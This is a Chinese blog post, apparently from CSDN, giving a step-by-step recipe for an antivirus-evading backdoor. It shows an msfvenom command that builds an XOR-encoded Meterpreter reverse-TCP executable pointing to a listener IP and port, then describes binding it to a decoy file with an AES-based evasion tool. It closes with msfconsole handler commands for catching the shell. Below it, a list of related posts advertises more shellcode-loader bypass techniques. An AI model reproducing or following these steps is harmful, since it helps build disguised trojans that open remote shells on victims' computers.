shellcode后门免杀

最新推荐文章于 2024-05-09 15:30:00 发布
最新推荐文章于 2024-05-09 15:30:00 发布
阅读量3.2k 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ricklzc/article/details/122418887
版权

生产shellcode

## 基础环境
1、kali

## shellcode生产命令
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor_dynamic -i 200 LHOST=192.168.199.186 LPORT=22335 -f exe > yunan.exe

免杀环境安装

## 免杀工具地址:https://github.com/Ed1s0nZ/cool
1、go环境安装
	安装Go环境,版本要1.17及以上
    如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:
        
2、go环境配置
	go env -w GO111MODULE=on
	go env -w GOPROXY=https://goproxy.io,direct
    go install mvdan.cc/garble@latest
    
3、捆绑免杀
	下载本项目到D盘根目录,文件夹名字改为cool;exe可执行文件改名为:cool
	运行cool.exe;
	访问 http://127.0.0.1:9000 
            
4、材料准备
	1、将生成的shellcode exe 和捆绑的文件放在cool的目录下
    
5、选择AESshellcode2进行捆绑
	1、选择语言ruby
    2、输入shellcode的IP地址及端口号
    3、选择捆绑自定义木马、自定义文件
    4、生成
   	5、下载生成后的文件,将txt后缀改成exe

开启监听,等待上线

msfconsole

msf6 > use exploit/multi/handler 

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.199.181

msf6 exploit(multi/handler) > set lport 22335

msf6 exploit(multi/handler) > run

等待上线即可

Ricklzc
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
golang任意代码免杀绕过火绒+电脑管家
2301_79571829的博客
09-01 1027
火绒和电脑管家主要以静态规则为主,但是有时候静态杀起来也挺让人奔溃的,这边分享一下如何拿捏火绒和电脑管家本文主要介绍如何通过garble进行混淆编译来绕过火绒,garble也可以绕过其他杀软,但是对火绒和电脑管家特别有效果,以火绒为例 下面来对比一下golang原生和garble混淆编译后得差距来一个很原始的的shellcode loader代码,将原始shellcode base64后就进行加载执行。
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 1876
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
通过包装Go工具链来混淆Go代码-Golang开发
05-26
通过包装Go工具链来混淆Go代码乱码GO111MODULE = on go获取mvdan.cc/garble通过包装Go工具链来混淆Go代码。 需要Go 1.16或更高版本。 garble build [build flags] [packages]该工具还支持garble test,以使用混淆后的代码运行测试,而garble反向则可对诸如堆栈跟踪之类的文本进行反混淆处理。 有关最新用法信息,请参见garble -h。 目的生成一个与常规版本一样工作的二进制文件,但是其有关原始源代码的信息越少越好。 该工具是
【渗透实战】木马免杀
最新发布
logic1001的博客
05-09 934
base64 sgn编码。
Gradle 安装与配置
LuckyGuyy的博客
06-12 1338
1 安装 打开gradle官网 https://gradle.org/ 然后就会下载到最新版本的gradle压缩包,解压到你想安装的文件夹下即可。 2.环境变量的配置 此电脑(右击)-> 属性 -> 高级配置 -> 环境变量 在下边(系统变量)添加 GRADLE_HOME 值为 gradle的安装路径(这里最好复制) 再在系统变量中 path 中编辑添加%GRADLE_HOME%\bin就ok啦 3 检查Gradle是否安装成功 cmd进入命令提示符 敲入g
在Windows上安装Gradle
一万个小时
10-26 1735
一、开发环境 Java:JDK8(必须是JDK或JRE7以上,使用java -version查看当前电脑java版本) 操作系统:Windows 10 二、安装步骤 下载最新的Gradle压缩包 Gradle官网:https://gradle.org/ 当前最新版本下载地址:https://gradle.org/releases/,下载binary-only即可 解压下载的压缩包...
免杀对抗-fscan免杀
qq_73648490的博客
03-28 1158
最近拿fscan进内网老是被杀,看样子需要更新一下fscan了。
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
JsLoader:js免杀shellcode,绕过杀毒添加自启
05-05
JsLoader文章:
32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
garble:混淆Go构建
03-29
断章取义 GO111MODULE=on go get mvdan.cc/garble 通过包装Go工具链来混淆Go代码。 需要Go 1.16或更高版本。 garble build [build flags] [packages] 有关最新用法信息,请参见garble -h 。 目的 生成一个与常规版本一样工作的二进制文件,但其中包含的有关原始源代码的信息越少越好。 该工具旨在: 与cmd/go结合使用,以支持模块和构建缓存 给定相同的初始源代码,确定性和可重现性 在给定原始来源的情况下可逆,以消除混淆的恐慌痕迹 机制 该工具将对Go编译器和链接器的调用包装起来,以转换Go构建,以便: 用短的base64散列替换尽可能多的有用标识符 用较短的base64散列替换程序包路径 删除所有和信息 删除文件名和随机播放位置信息 剥离调试信息和符号表 如果给定了-literals标志,则对文字进
Garble-开源
07-09
Garble 是一个可移植的模块化 C++ 程序和库,用于连接 Garmin GPS 接收器。
Python库 | garble-0.0.2.tar.gz
05-16
资源分类:Python库 所属语言:Python 资源全名:garble-0.0.2.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
Golang-Gin 框架写的免杀平台,内置分离、捆绑等多种BypassAV方式
qq_44005305的博客
01-31 371
第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)点击生成目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。
go工具
J0KER的博客
11-26 266
golang
go install安装遇见的各种问题
qq_22132931的博客
02-06 627
go install安装遇见的各种问题
免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader​
qq_56426046的博客
10-04 2022
GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。
shellcode 免杀
05-29
Shellcode 免杀技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被杀毒软件或安全设备检测时无法被识别,从而达到免杀的目的。 以下是一些常见的 Shellcode 免杀技术: 1. 加密:将 Shellcode ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值